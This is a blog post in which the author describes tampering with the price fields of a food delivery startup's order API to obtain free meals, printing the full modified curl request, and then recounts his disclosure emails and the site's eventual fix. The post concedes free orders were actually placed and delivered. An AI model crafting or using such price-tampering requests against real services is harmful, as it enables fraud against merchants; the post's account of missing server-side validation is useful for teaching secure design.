First of all I would like to thank BiteClub.in for developing a not-so-secure website because of which I was able to get meals free of cost this weekend.So it started with me trying to place an order on BiteClub.in for dinner. I tried several times but each time it failed. Damn, I was not able to place an order. So I thought I should check what all API calls they are making and try to figure out what might be the issue.For those who don't know what BiteClub.in is, it is a food providing service which connects local chefs directly to the users. It is currently serving in Gurgaon and Delhi.During the investigation of API calls, I found something very buggy. There was an API call to confirm the order to their server. This is the same API call which was failing. I started going deep into this API call and started analysing its parameters. The API call was(in curl format):From this API call, I was able to figure out following information:Finally I modified the API call and put 0(zero) as the price for last three parameters(i.e., finalPrice, numberOfCredits and subtotal) leaving amount as it was and bam it worked! That was all that was needed to get free food!

YESSSS I was able to place orders at a cost of 0(zero)



curl 'http://biteclubproduction.elasticbeanstalk.com/api/order' -H 'Origin: http://biteclub.in' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.8,cs;q=0.6,es;q=0.4' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: http://biteclub.in/checkout' -H 'Connection: keep-alive' --data-binary '{"amount":100,"customer":{"class":"in.biteclub.User","id":"****"},"orderDateParameter":"20150711","deliveryAddress":{"fullAddress":"****","landmark":"****","deliveryArea":{"class":"in.biteclub.DeliveryArea","id":"546312a4e4b0c20a57500d70"}},"deliveryArea":{"class":"in.biteclub.DeliveryArea","id":"546312a4e4b0c20a57500d70"},"hub":{"class":"in.biteclub.Hub","id":"553cbec3e4b0eee8a02f0645"},"deliveryTimeSlot":{"beginHour":19,"beginMinute":0,"endHour":20,"endMinute":0},"orderItems":[{"dish":{"class":"in.biteclub.Dish","id":"550874f5e4b01d0843550b49"},"quantity":1," finalPrice":0 }],"paymentMethod":"Cash on Delivery","channel":"Web","creditsUsed":true, "numberOfCredits":"0" , "subtotal":0 ,"taxes":{"VAT":0},"periodOfDay":"Dinner"}' --compressed

And then after a few hours, I got the food.

I asked the delivery boy: How much should I pay?

Delivery boy: Nothing Sir! Your order cost is 0.





So in the whole process from ordering to delivery, they were not able to figure out how the cost of a particular item could be 0.

Why did this security problem occur?

The even bigger mistake :

Telling this to BiteClub.in

I sent an email to delicious@biteclub.in

Hello Biteclub, This evening (around 5 PM), I was trying to place an order on your website: biteclub.in but was not able to do so. On the last page, I was always getting “Failure”. So, just out of curiosity, I tried to figure out what may be the issue I am facing. While debugging that I found a security threat on your website. I explored it a bit more. Finally, I was able to place an order (worth Rs 200) on your website by modifying the cost to 0.

My Free Meal Pic ;)





The modified API call was:Seconds after running this command in my Terminal, I got the confirmation email from BiteClub that my order had been successfully placed and yes the cost of the order in that email was:)Here is the screenshot of the email:I never thought, any developer could commit this silly mistake. They only made client side calculations and validations. No server side calculations or checks were in place. Whatever the cost and prices of the items were sent in the request, they were used directly without validating them for their correctness.It leaves me absolutely furious to see developers and startup so blatantly ignore security. How can they assume that they can implement insecure, non-encrypted API calls with no mechanisms for establishing the client and user's identity only on the assumption that "no one would take the time to meddle with our API" for a free (insert Pizza/Salad/Thaali here). A similar incident had come to surface, much to the shock of any sane geek when Ola was making wallet transactions on an open HTTP API. Bravo Sirs! With the availability of federated identity systems and now even the OAuth mechanisms provided by FaceBook, Google, Twitter, GitHub etc. it has become so difficult not to create a secure native / web client, but somehow, someone manages to do it :)nBut to my surprise, they did not reply and did not even bother to contact me to enquire more about the problem.I sent this mail at 7:22 PM. When I rechecked the issue at 11:00 PM, it was still there and it was still allowing me to place an order with cost zero. I was really shocked at their response.I then sent a message to them on facebook, it was seen instantly, but again, no reply.So, I decided to notify their founders regarding the issue. I messaged all the founders on the linkedin. But all in vain. Nobody responded.I had to go out of station for few days after that. On coming back, I rechecked it. They had fixed it finally.It is very sad to know that these startups are just building websites/application but not putting in adequate mechanisms to ensure the safety of their applications. Also, their negligence to the mails and messages was very disappointing. I was very ready to explain the issue to them but they never bothered asking me. They simply ignored them. But I am happy that they have at least fixed it.